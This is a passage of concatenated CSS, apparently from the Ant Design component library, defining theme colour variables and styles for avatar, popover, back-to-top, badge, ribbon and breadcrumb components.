#7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-avatar { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: inline-block; overflow: hidden; color: #fff; white-space: nowrap; text-align: center; vertical-align: middle; background: #ccc; width: 32px; height: 32px; line-height: 32px; border-radius: 50%; } .ant-avatar-image { background: transparent; } .ant-avatar .ant-image-img { display: block; } .ant-avatar-string { position: absolute; left: 50%; transform-origin: 0 center; } .ant-avatar.ant-avatar-icon { font-size: 18px; } .ant-avatar.ant-avatar-icon > .anticon { margin: 0; } .ant-avatar-lg { width: 40px; height: 40px; line-height: 40px; border-radius: 50%; } .ant-avatar-lg-string { position: absolute; left: 50%; transform-origin: 0 center; } .ant-avatar-lg.ant-avatar-icon { font-size: 24px; } .ant-avatar-lg.ant-avatar-icon > .anticon { margin: 0; } .ant-avatar-sm { width: 24px; height: 24px; line-height: 24px; border-radius: 50%; } .ant-avatar-sm-string { position: absolute; left: 50%; transform-origin: 0 center; } .ant-avatar-sm.ant-avatar-icon { font-size: 14px; } .ant-avatar-sm.ant-avatar-icon > .anticon { margin: 0; } .ant-avatar-square { border-radius: 2px; } .ant-avatar > img { display: block; width: 100%; height: 100%; -o-object-fit: cover; object-fit: cover; } .ant-avatar-group { display: inline-flex; } .ant-avatar-group .ant-avatar { border: 1px solid #fff; } .ant-avatar-group .ant-avatar:not(:first-child) { margin-left: -8px; } .ant-avatar-group-popover .ant-avatar + .ant-avatar { margin-left: 3px; } .ant-avatar-group-rtl .ant-avatar:not(:first-child) { margin-right: -8px; margin-left: 0; } .ant-avatar-group-popover.ant-popover-rtl .ant-avatar + .ant-avatar { margin-right: 3px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-popover { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; top: 0; left: 0; z-index: 1030; font-weight: normal; white-space: normal; text-align: left; cursor: auto; -webkit-user-select: text; -moz-user-select: text; -ms-user-select: text; user-select: text; } .ant-popover::after { position: absolute; background: rgba(255, 255, 255, 0.01); content: ''; } .ant-popover-hidden { display: none; } .ant-popover-placement-top, .ant-popover-placement-topLeft, .ant-popover-placement-topRight { padding-bottom: 10px; } .ant-popover-placement-right, .ant-popover-placement-rightTop, .ant-popover-placement-rightBottom { padding-left: 10px; } .ant-popover-placement-bottom, .ant-popover-placement-bottomLeft, .ant-popover-placement-bottomRight { padding-top: 10px; } .ant-popover-placement-left, .ant-popover-placement-leftTop, .ant-popover-placement-leftBottom { padding-right: 10px; } .ant-popover-inner { background-color: #fff; background-clip: padding-box; border-radius: 2px; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); box-shadow: 0 0 8px rgba(0, 0, 0, 0.15) \9; } @media screen and (-ms-high-contrast: active), (-ms-high-contrast: none) { .ant-popover { /* IE10+ */ } .ant-popover-inner { box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); } } .ant-popover-title { min-width: 177px; min-height: 32px; margin: 0; padding: 5px 16px 4px; color: rgba(0, 0, 0, 0.85); font-weight: 500; border-bottom: 1px solid #f0f0f0; } .ant-popover-inner-content { padding: 12px 16px; color: rgba(0, 0, 0, 0.85); } .ant-popover-message { position: relative; padding: 4px 0 12px; color: rgba(0, 0, 0, 0.85); font-size: 14px; } .ant-popover-message > .anticon { position: absolute; top: 8.0005px; color: var(--ant-warning-color); font-size: 14px; } .ant-popover-message-title { padding-left: 22px; } .ant-popover-buttons { margin-bottom: 4px; text-align: right; } .ant-popover-buttons button { margin-left: 8px; } .ant-popover-arrow { position: absolute; display: block; width: 8.48528137px; height: 8.48528137px; overflow: hidden; background: transparent; pointer-events: none; } .ant-popover-arrow-content { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 6px; height: 6px; margin: auto; background-color: #fff; content: ''; pointer-events: auto; } .ant-popover-placement-top .ant-popover-arrow, .ant-popover-placement-topLeft .ant-popover-arrow, .ant-popover-placement-topRight .ant-popover-arrow { bottom: 1.51471863px; } .ant-popover-placement-top .ant-popover-arrow-content, .ant-popover-placement-topLeft .ant-popover-arrow-content, .ant-popover-placement-topRight .ant-popover-arrow-content { box-shadow: 3px 3px 7px rgba(0, 0, 0, 0.07); transform: translateY(-4.24264069px) rotate(45deg); } .ant-popover-placement-top .ant-popover-arrow { left: 50%; transform: translateX(-50%); } .ant-popover-placement-topLeft .ant-popover-arrow { left: 16px; } .ant-popover-placement-topRight .ant-popover-arrow { right: 16px; } .ant-popover-placement-right .ant-popover-arrow, .ant-popover-placement-rightTop .ant-popover-arrow, .ant-popover-placement-rightBottom .ant-popover-arrow { left: 1.51471863px; } .ant-popover-placement-right .ant-popover-arrow-content, .ant-popover-placement-rightTop .ant-popover-arrow-content, .ant-popover-placement-rightBottom .ant-popover-arrow-content { box-shadow: -3px 3px 7px rgba(0, 0, 0, 0.07); transform: translateX(4.24264069px) rotate(45deg); } .ant-popover-placement-right .ant-popover-arrow { top: 50%; transform: translateY(-50%); } .ant-popover-placement-rightTop .ant-popover-arrow { top: 12px; } .ant-popover-placement-rightBottom .ant-popover-arrow { bottom: 12px; } .ant-popover-placement-bottom .ant-popover-arrow, .ant-popover-placement-bottomLeft .ant-popover-arrow, .ant-popover-placement-bottomRight .ant-popover-arrow { top: 1.51471863px; } .ant-popover-placement-bottom .ant-popover-arrow-content, .ant-popover-placement-bottomLeft .ant-popover-arrow-content, .ant-popover-placement-bottomRight .ant-popover-arrow-content { box-shadow: -2px -2px 5px rgba(0, 0, 0, 0.06); transform: translateY(4.24264069px) rotate(45deg); } .ant-popover-placement-bottom .ant-popover-arrow { left: 50%; transform: translateX(-50%); } .ant-popover-placement-bottomLeft .ant-popover-arrow { left: 16px; } .ant-popover-placement-bottomRight .ant-popover-arrow { right: 16px; } .ant-popover-placement-left .ant-popover-arrow, .ant-popover-placement-leftTop .ant-popover-arrow, .ant-popover-placement-leftBottom .ant-popover-arrow { right: 1.51471863px; } .ant-popover-placement-left .ant-popover-arrow-content, .ant-popover-placement-leftTop .ant-popover-arrow-content, .ant-popover-placement-leftBottom .ant-popover-arrow-content { box-shadow: 3px -3px 7px rgba(0, 0, 0, 0.07); transform: translateX(-4.24264069px) rotate(45deg); } .ant-popover-placement-left .ant-popover-arrow { top: 50%; transform: translateY(-50%); } .ant-popover-placement-leftTop .ant-popover-arrow { top: 12px; } .ant-popover-placement-leftBottom .ant-popover-arrow { bottom: 12px; } .ant-popover-pink .ant-popover-inner { background-color: #eb2f96; } .ant-popover-pink .ant-popover-arrow-content { background-color: #eb2f96; } .ant-popover-magenta .ant-popover-inner { background-color: #eb2f96; } .ant-popover-magenta .ant-popover-arrow-content { background-color: #eb2f96; } .ant-popover-red .ant-popover-inner { background-color: #f5222d; } .ant-popover-red .ant-popover-arrow-content { background-color: #f5222d; } .ant-popover-volcano .ant-popover-inner { background-color: #fa541c; } .ant-popover-volcano .ant-popover-arrow-content { background-color: #fa541c; } .ant-popover-orange .ant-popover-inner { background-color: #fa8c16; } .ant-popover-orange .ant-popover-arrow-content { background-color: #fa8c16; } .ant-popover-yellow .ant-popover-inner { background-color: #fadb14; } .ant-popover-yellow .ant-popover-arrow-content { background-color: #fadb14; } .ant-popover-gold .ant-popover-inner { background-color: #faad14; } .ant-popover-gold .ant-popover-arrow-content { background-color: #faad14; } .ant-popover-cyan .ant-popover-inner { background-color: #13c2c2; } .ant-popover-cyan .ant-popover-arrow-content { background-color: #13c2c2; } .ant-popover-lime .ant-popover-inner { background-color: #a0d911; } .ant-popover-lime .ant-popover-arrow-content { background-color: #a0d911; } .ant-popover-green .ant-popover-inner { background-color: #52c41a; } .ant-popover-green .ant-popover-arrow-content { background-color: #52c41a; } .ant-popover-blue .ant-popover-inner { background-color: #1890ff; } .ant-popover-blue .ant-popover-arrow-content { background-color: #1890ff; } .ant-popover-geekblue .ant-popover-inner { background-color: #2f54eb; } .ant-popover-geekblue .ant-popover-arrow-content { background-color: #2f54eb; } .ant-popover-purple .ant-popover-inner { background-color: #722ed1; } .ant-popover-purple .ant-popover-arrow-content { background-color: #722ed1; } .ant-popover-rtl { direction: rtl; text-align: right; } .ant-popover-rtl .ant-popover-message-title { padding-right: 22px; padding-left: 16px; } .ant-popover-rtl .ant-popover-buttons { text-align: left; } .ant-popover-rtl .ant-popover-buttons button { margin-right: 8px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-back-top { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: fixed; right: 100px; bottom: 50px; z-index: 10; width: 40px; height: 40px; cursor: pointer; } .ant-back-top:empty { display: none; } .ant-back-top-rtl { right: auto; left: 100px; direction: rtl; } .ant-back-top-content { width: 40px; height: 40px; overflow: hidden; color: #fff; text-align: center; background-color: rgba(0, 0, 0, 0.45); border-radius: 20px; transition: all 0.3s; } .ant-back-top-content:hover { background-color: rgba(0, 0, 0, 0.85); transition: all 0.3s; } .ant-back-top-icon { font-size: 24px; line-height: 40px; } @media screen and (max-width: 768px) { .ant-back-top { right: 60px; } } @media screen and (max-width: 480px) { .ant-back-top { right: 20px; } } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-badge { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: inline-block; line-height: 1; } .ant-badge-count { z-index: auto; min-width: 20px; height: 20px; padding: 0 6px; color: #fff; font-weight: normal; font-size: 12px; line-height: 20px; white-space: nowrap; text-align: center; background: #ff4d4f; border-radius: 10px; box-shadow: 0 0 0 1px #fff; } .ant-badge-count a, .ant-badge-count a:hover { color: #fff; } .ant-badge-count-sm { min-width: 14px; height: 14px; padding: 0; font-size: 12px; line-height: 14px; border-radius: 7px; } .ant-badge-multiple-words { padding: 0 8px; } .ant-badge-dot { z-index: auto; width: 6px; min-width: 6px; height: 6px; background: #ff4d4f; border-radius: 100%; box-shadow: 0 0 0 1px #fff; } .ant-badge-dot.ant-scroll-number { transition: background 1.5s; } .ant-badge-count, .ant-badge-dot, .ant-badge .ant-scroll-number-custom-component { position: absolute; top: 0; right: 0; transform: translate(50%, -50%); transform-origin: 100% 0%; } .ant-badge-count.anticon-spin, .ant-badge-dot.anticon-spin, .ant-badge .ant-scroll-number-custom-component.anticon-spin { -webkit-animation: antBadgeLoadingCircle 1s infinite linear; animation: antBadgeLoadingCircle 1s infinite linear; } .ant-badge-status { line-height: inherit; vertical-align: baseline; } .ant-badge-status-dot { position: relative; top: -1px; display: inline-block; width: 6px; height: 6px; vertical-align: middle; border-radius: 50%; } .ant-badge-status-success { background-color: var(--ant-success-color); } .ant-badge-status-processing { position: relative; background-color: var(--ant-primary-color); } .ant-badge-status-processing::after { position: absolute; top: 0; left: 0; width: 100%; height: 100%; border: 1px solid var(--ant-primary-color); border-radius: 50%; -webkit-animation: antStatusProcessing 1.2s infinite ease-in-out; animation: antStatusProcessing 1.2s infinite ease-in-out; content: ''; } .ant-badge-status-default { background-color: #d9d9d9; } .ant-badge-status-error { background-color: var(--ant-error-color); } .ant-badge-status-warning { background-color: var(--ant-warning-color); } .ant-badge-status-pink { background: #eb2f96; } .ant-badge-status-magenta { background: #eb2f96; } .ant-badge-status-red { background: #f5222d; } .ant-badge-status-volcano { background: #fa541c; } .ant-badge-status-orange { background: #fa8c16; } .ant-badge-status-yellow { background: #fadb14; } .ant-badge-status-gold { background: #faad14; } .ant-badge-status-cyan { background: #13c2c2; } .ant-badge-status-lime { background: #a0d911; } .ant-badge-status-green { background: #52c41a; } .ant-badge-status-blue { background: #1890ff; } .ant-badge-status-geekblue { background: #2f54eb; } .ant-badge-status-purple { background: #722ed1; } .ant-badge-status-text { margin-left: 8px; color: rgba(0, 0, 0, 0.85); font-size: 14px; } .ant-badge-zoom-appear, .ant-badge-zoom-enter { -webkit-animation: antZoomBadgeIn 0.3s cubic-bezier(0.12, 0.4, 0.29, 1.46); animation: antZoomBadgeIn 0.3s cubic-bezier(0.12, 0.4, 0.29, 1.46); -webkit-animation-fill-mode: both; animation-fill-mode: both; } .ant-badge-zoom-leave { -webkit-animation: antZoomBadgeOut 0.3s cubic-bezier(0.71, -0.46, 0.88, 0.6); animation: antZoomBadgeOut 0.3s cubic-bezier(0.71, -0.46, 0.88, 0.6); -webkit-animation-fill-mode: both; animation-fill-mode: both; } .ant-badge-not-a-wrapper .ant-badge-zoom-appear, .ant-badge-not-a-wrapper .ant-badge-zoom-enter { -webkit-animation: antNoWrapperZoomBadgeIn 0.3s cubic-bezier(0.12, 0.4, 0.29, 1.46); animation: antNoWrapperZoomBadgeIn 0.3s cubic-bezier(0.12, 0.4, 0.29, 1.46); } .ant-badge-not-a-wrapper .ant-badge-zoom-leave { -webkit-animation: antNoWrapperZoomBadgeOut 0.3s cubic-bezier(0.71, -0.46, 0.88, 0.6); animation: antNoWrapperZoomBadgeOut 0.3s cubic-bezier(0.71, -0.46, 0.88, 0.6); } .ant-badge-not-a-wrapper:not(.ant-badge-status) { vertical-align: middle; } .ant-badge-not-a-wrapper .ant-scroll-number-custom-component, .ant-badge-not-a-wrapper .ant-badge-count { transform: none; } .ant-badge-not-a-wrapper .ant-scroll-number-custom-component, .ant-badge-not-a-wrapper .ant-scroll-number { position: relative; top: auto; display: block; transform-origin: 50% 50%; } @-webkit-keyframes antStatusProcessing { 0% { transform: scale(0.8); opacity: 0.5; } 100% { transform: scale(2.4); opacity: 0; } } @keyframes antStatusProcessing { 0% { transform: scale(0.8); opacity: 0.5; } 100% { transform: scale(2.4); opacity: 0; } } .ant-scroll-number { overflow: hidden; direction: ltr; } .ant-scroll-number-only { position: relative; display: inline-block; height: 20px; transition: all 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); /* stylelint-disable property-no-vendor-prefix */ -webkit-transform-style: preserve-3d; -webkit-backface-visibility: hidden; /* stylelint-enable property-no-vendor-prefix */ } .ant-scroll-number-only > p.ant-scroll-number-only-unit { height: 20px; margin: 0; /* stylelint-disable property-no-vendor-prefix */ -webkit-transform-style: preserve-3d; -webkit-backface-visibility: hidden; /* stylelint-enable property-no-vendor-prefix */ } .ant-scroll-number-symbol { vertical-align: top; } @-webkit-keyframes antZoomBadgeIn { 0% { transform: scale(0) translate(50%, -50%); opacity: 0; } 100% { transform: scale(1) translate(50%, -50%); } } @keyframes antZoomBadgeIn { 0% { transform: scale(0) translate(50%, -50%); opacity: 0; } 100% { transform: scale(1) translate(50%, -50%); } } @-webkit-keyframes antZoomBadgeOut { 0% { transform: scale(1) translate(50%, -50%); } 100% { transform: scale(0) translate(50%, -50%); opacity: 0; } } @keyframes antZoomBadgeOut { 0% { transform: scale(1) translate(50%, -50%); } 100% { transform: scale(0) translate(50%, -50%); opacity: 0; } } @-webkit-keyframes antNoWrapperZoomBadgeIn { 0% { transform: scale(0); opacity: 0; } 100% { transform: scale(1); } } @keyframes antNoWrapperZoomBadgeIn { 0% { transform: scale(0); opacity: 0; } 100% { transform: scale(1); } } @-webkit-keyframes antNoWrapperZoomBadgeOut { 0% { transform: scale(1); } 100% { transform: scale(0); opacity: 0; } } @keyframes antNoWrapperZoomBadgeOut { 0% { transform: scale(1); } 100% { transform: scale(0); opacity: 0; } } @-webkit-keyframes antBadgeLoadingCircle { 0% { transform-origin: 50%; } 100% { transform: translate(50%, -50%) rotate(360deg); transform-origin: 50%; } } @keyframes antBadgeLoadingCircle { 0% { transform-origin: 50%; } 100% { transform: translate(50%, -50%) rotate(360deg); transform-origin: 50%; } } .ant-ribbon-wrapper { position: relative; } .ant-ribbon { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; top: 8px; height: 22px; padding: 0 8px; color: #fff; line-height: 22px; white-space: nowrap; background-color: var(--ant-primary-color); border-radius: 2px; } .ant-ribbon-text { color: #fff; } .ant-ribbon-corner { position: absolute; top: 100%; width: 8px; height: 8px; color: currentColor; border: 4px solid; transform: scaleY(0.75); transform-origin: top; } .ant-ribbon-corner::after { position: absolute; top: -4px; left: -4px; width: inherit; height: inherit; color: rgba(0, 0, 0, 0.25); border: inherit; content: ''; } .ant-ribbon-color-pink { color: #eb2f96; background: #eb2f96; } .ant-ribbon-color-magenta { color: #eb2f96; background: #eb2f96; } .ant-ribbon-color-red { color: #f5222d; background: #f5222d; } .ant-ribbon-color-volcano { color: #fa541c; background: #fa541c; } .ant-ribbon-color-orange { color: #fa8c16; background: #fa8c16; } .ant-ribbon-color-yellow { color: #fadb14; background: #fadb14; } .ant-ribbon-color-gold { color: #faad14; background: #faad14; } .ant-ribbon-color-cyan { color: #13c2c2; background: #13c2c2; } .ant-ribbon-color-lime { color: #a0d911; background: #a0d911; } .ant-ribbon-color-green { color: #52c41a; background: #52c41a; } .ant-ribbon-color-blue { color: #1890ff; background: #1890ff; } .ant-ribbon-color-geekblue { color: #2f54eb; background: #2f54eb; } .ant-ribbon-color-purple { color: #722ed1; background: #722ed1; } .ant-ribbon.ant-ribbon-placement-end { right: -8px; border-bottom-right-radius: 0; } .ant-ribbon.ant-ribbon-placement-end .ant-ribbon-corner { right: 0; border-color: currentColor transparent transparent currentColor; } .ant-ribbon.ant-ribbon-placement-start { left: -8px; border-bottom-left-radius: 0; } .ant-ribbon.ant-ribbon-placement-start .ant-ribbon-corner { left: 0; border-color: currentColor currentColor transparent transparent; } .ant-badge-rtl { direction: rtl; } .ant-badge-rtl .ant-badge:not(.ant-badge-not-a-wrapper) .ant-badge-count, .ant-badge-rtl .ant-badge:not(.ant-badge-not-a-wrapper) .ant-badge-dot, .ant-badge-rtl .ant-badge:not(.ant-badge-not-a-wrapper) .ant-scroll-number-custom-component { right: auto; left: 0; direction: ltr; transform: translate(-50%, -50%); transform-origin: 0% 0%; } .ant-badge-rtl.ant-badge:not(.ant-badge-not-a-wrapper) .ant-scroll-number-custom-component { right: auto; left: 0; transform: translate(-50%, -50%); transform-origin: 0% 0%; } .ant-badge-rtl .ant-badge-status-text { margin-right: 8px; margin-left: 0; } .ant-ribbon-rtl { direction: rtl; } .ant-ribbon-rtl.ant-ribbon-placement-end { right: unset; left: -8px; border-bottom-right-radius: 2px; border-bottom-left-radius: 0; } .ant-ribbon-rtl.ant-ribbon-placement-end .ant-ribbon-corner { right: unset; left: 0; border-color: currentColor currentColor transparent transparent; } .ant-ribbon-rtl.ant-ribbon-placement-end .ant-ribbon-corner::after { border-color: currentColor currentColor transparent transparent; } .ant-ribbon-rtl.ant-ribbon-placement-start { right: -8px; left: unset; border-bottom-right-radius: 0; border-bottom-left-radius: 2px; } .ant-ribbon-rtl.ant-ribbon-placement-start .ant-ribbon-corner { right: 0; left: unset; border-color: currentColor transparent transparent currentColor; } .ant-ribbon-rtl.ant-ribbon-placement-start .ant-ribbon-corner::after { border-color: currentColor transparent transparent currentColor; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-breadcrumb { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; color: rgba(0, 0, 0, 0.45); font-size: 14px; } .ant-breadcrumb .anticon { font-size: 14px; } .ant-breadcrumb a { color: rgba(0, 0, 0, 0.45); transition: color 0.3s; } .ant-breadcrumb a:hover { color: var(--ant-primary-5); } .ant-breadcrumb > span:last-child { color: rgba(0, 0, 0, 0.85); } .ant-breadcrumb > span:last-child a { color: rgba(0, 0, 0, 0.85); } .ant-breadcrumb > span:last-child .ant-breadcrumb-separator { display: none; } .ant-breadcrumb-separator { margin: 0 8px; color: rgba(0, 0, 0, 0.45); } .ant-breadcrumb-link > .anticon + span, .ant-breadcrumb-link > .anticon + a { margin-left: 4px; } .ant-breadcrumb-overlay-link > .anticon { margin-left: 4px; } .ant-breadcrumb-rtl { direction: rtl; } .ant-breadcrumb-rtl::before { display: table; content: ''; } .ant-breadcrumb-rtl::after { display: table; clear: both; content: ''; } .ant-breadcrumb-rtl > span { float: right; } .ant-breadcrumb-rtl .ant-breadcrumb-link > .anticon + span, .ant-breadcrumb-rtl .ant-breadcrumb-link > .anticon + a { margin-right: 4px; margin-left: 0; } .ant-breadcrumb-rtl .ant-breadcrumb-overlay-link > .anticon { margin-right: 4px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; 